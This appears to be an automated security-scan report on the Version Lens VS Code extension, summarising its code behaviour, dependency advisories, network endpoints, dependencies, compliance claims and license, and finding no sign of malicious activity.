Is Version Lens safe?

Findings

high

Enterprise Only

medium

Enterprise Only

low

Enterprise Only

FINDINGS ARE AVAILABLE FOR ENTERPRISE USERS

Code analysis

AI-powered analysis of the extension's source code for security insights and risk assessment.

Version Lens is a Visual Studio Code extension that displays the latest available versions for dependencies in various package manager files using code lens annotations. Its primary intention is to help developers keep their dependencies up to date by showing version suggestions inline in the editor.

Key Behaviors and API Usage

VSCode API Usage: The extension registers multiple commands, code lens providers, and event listeners for editor and workspace events (e.g., file changes, saves, active editor changes).
Network Activity: The extension fetches package version information from remote registries (npm, PyPI, Maven, etc.) using HTTP requests. This is handled through HTTP client abstractions and is limited to querying public package registries.
Filesystem Activity: Reads package files (e.g., package.json, pyproject.toml) to parse dependencies. It also reads its own extension package.json for versioning.
No Arbitrary Code Execution: There is no evidence of shell, PowerShell, or arbitrary code execution. The extension does not spawn processes except for executing VSCode tasks explicitly configured by the user.
No Registry or User Manipulation: There is no access to the Windows registry, user account creation, or clipboard access.
Persistence: The extension does not implement persistence mechanisms outside of standard VSCode extension activation.
No Obfuscation: The code is bundled and minified for distribution but not obfuscated. Variable names are shortened, but logic is readable and not intentionally hidden.

Example of Network Request Logic

class JsonHttpClient {
  request(method, url, query = {}, headers = {}) {
    return this.httpClient.request(method, url, query, headers)
      .then(response => ({
        source: response.source,
        status: response.status,
        data: JSON.parse(response.data)
      }));
  }
}

Example of CodeLens Provider Registration

this.disposable = vscode.languages.registerCodeLensProvider(
  suggestionProvider.config.fileMatcher,
  this
);

Example of Command Registration

this.disposable = vscode.commands.registerCommand(
  SuggestionCommandContributions.OnUpdateDependencyClick,
  this.execute,
  this
);

No strong indicators of malicious activity were observed.

API Calls

API calls detected through static analysis of the source code. For more accurate insights, explore our sandbox dynamic analysis.

high

Enterprise Only

medium

Enterprise Only

low

Enterprise Only

API CALLS ARE AVAILABLE FOR ENTERPRISE USERS

Secrets

Any encoded/decoded secrets we managed to find in the source code, git repository, or related files

NpmToken

/extension/node_modules/triple-beam/.nyc_output/processinfo/index.json

Unverified

All secrets are available for Enterprise users

Vulnerabilities

Known vulnerabilities and security issues detected in the extension's dependencies and code.

GHSA-952p-6rrq-rcjv

Regular Expression Denial of Service (ReDoS) in micromatch

CVSS:

GHSA-v6h2-p8h4-qcjw

brace-expansion Regular Expression Denial of Service vulnerability

CVSS:

GHSA-3xgq-45jj-v275

Regular Expression Denial of Service (ReDoS) in cross-spawn

CVSS:

All vulnerabilities are available for Enterprise users

External communication

Any identifiers we detected that may indicate external communication from the item's code

https://api.github.com/repos/$

extension/dist/677.bundle.js

https://api.nuget.org/v3/index.json

extension/dist/56.bundle.js

https://repo.maven.apache.org/maven2/

extension/dist/823.bundle.js

All external communications are available for Enterprise users

Dependencies

Dependencies and third-party libraries used by the extension, including version information and license details.

@npmcli/config

Version:

8.3.2

@npmcli/promise-spawn

Version:

7.0.2

@esm-test/guards

Version:

Unknown

All dependencies are available for Enterprise users

Licenses & Compliance

Compliance

Compliance status and certifications for the extension and its publisher

VersionLens

VersionLens is ISO 27001 certified, as indicated in their communications and compliance statements. No evidence was found regarding the ISO 27001 compliance of any parent company, suggesting that it may not have a parent organization that is compliant with this standard.

Compliant

Version Lens

Version Lens is SOC 2 Type 1 compliant and is currently working towards achieving SOC 2 Type 2 certification. There is no mention of a parent company on the site.

Compliant

Licenses

ISC License

View License

"The ISC License\n\nCopyright (c) Peter Flannery and Contributors\n\nPermission to use, copy, modify, and/or distribute this software for any\npurpose with or without fee is hereby granted, provided t...